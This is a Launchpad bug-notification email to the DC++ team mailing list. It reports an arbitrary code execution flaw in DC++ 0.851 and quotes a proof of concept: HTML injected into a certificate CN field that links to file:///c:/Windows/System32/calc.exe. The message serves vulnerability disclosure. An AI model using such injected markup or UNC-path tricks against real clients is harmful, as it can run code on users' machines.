Link is correct, Look to PoC: certificate details:
CN=<a href="file:///c:/Windows/System32/calc.exe">\x0D\x0A<img src="http://www.troll.me/images/are-you-fucking-kidding-me/srsly.jpg"; />\x0D\x0A</a>\x0D\x0A<h1><a href="file:///c:/Windows/System32/calc.exe">Click Here</a></h1> Its the same PoC with file:// scheme. -- You received this bug notification because you are a member of Dcplusplus-team, which is subscribed to DC++. https://bugs.launchpad.net/bugs/1502650 Title: DC++ 0.851 - Arbitrary code execution Status in DC++: New Bug description: Details and PoC: http://kacperrybczynski.com/research/dcpp_851_arbitrary_code_execution/ By supplying an UNC path in the *.dcext plugin file or main/pm hub chat, a remote file will be automatically downloaded, which can result in arbitrary code execution. To manage notifications about this bug go to: https://bugs.launchpad.net/dcplusplus/+bug/1502650/+subscriptions _______________________________________________ Mailing list: https://launchpad.net/~linuxdcpp-team Post to : linuxdcpp-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~linuxdcpp-team More help : https://help.launchpad.net/ListHelp
![http://www.troll.me/images/are-you-fucking-kidding-me/srsly.jpg"](http://www.troll.me/images/are-you-fucking-kidding-me/srsly.jpg"){kind=link}